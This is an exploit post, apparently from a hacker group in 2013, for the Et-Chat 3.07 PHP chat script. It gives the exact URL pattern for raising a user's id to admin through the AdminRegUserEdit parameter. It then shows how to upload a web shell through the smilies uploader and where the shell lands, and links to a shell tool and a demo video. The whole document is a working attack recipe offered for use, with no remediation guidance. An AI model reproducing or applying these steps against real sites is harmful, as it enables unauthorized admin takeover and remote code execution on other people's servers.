Et-Chat version 3.07 suffers from a privilege escalation vulnerability that then enables a user to upload a shell.
0e5c91de166e96816038a7f98567514c202036f0f1912a66b14cb371c8775dc2
# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution
# Exploit Author: MR.XpR
# Script Download : http://et-chat.ir/up/et_chat_v307.zip
# Risk : Normal
# Platforms : PHP
# Tested on: 7 , KAli , Vista
# Date : 2013
<------------------------------------------>
-==========<RcE>==========-
# How does :
This error occurs due to keep cookies
# Exploit :
/?AdminRegUserEdit&[user or admin]&id=[Parameter]
/?AdminRegUserEdit&admin&id=[Parameter]
# p0c :
get the user id and replace to Parameter
For example, my user id is 4
http://site.com/chat/?AdminRegUserEdit&admin&id=4
next u are a admin user
-==========<Uploader>==========-
# For uploading sh3ll go to
/?AdminInsertSmilies <====- Uploader
http://site.com/chat/?AdminInsertSmilies
# your shell Should be less than 15 KB
Patch your sh3ll from :
http://site.com/smilies/sh3ll.php
-=====> IRH mini sheller For Use To this Exploit : <=====-
# Download :
http://uploaderx.persiangig.com/IRH_MINI_Sheller_V1/IRH-Mini-Sheller.zip
# D3mo video :
http://uploaderx.persiangig.com/Et_RCe_Rfu.zip
# for more security :
http://iranhack.org/acc/thread-1082.html
<------------------------------------------>
Greetz : V30Sharp , Moji Rider , Secret.Walker , K3rn3l , Samim.s ,
Farbod Ezrail , @3is , 3nist3in , Siamak.Black
Greetz : r0bb3r68 , M.R.S.CO , Mя.V3nd3tt4 , N4BIL , Ali_Sedaghat ,
MR.XHat , vahid4251 , HACKER OF FLOOD & All Member OF IRH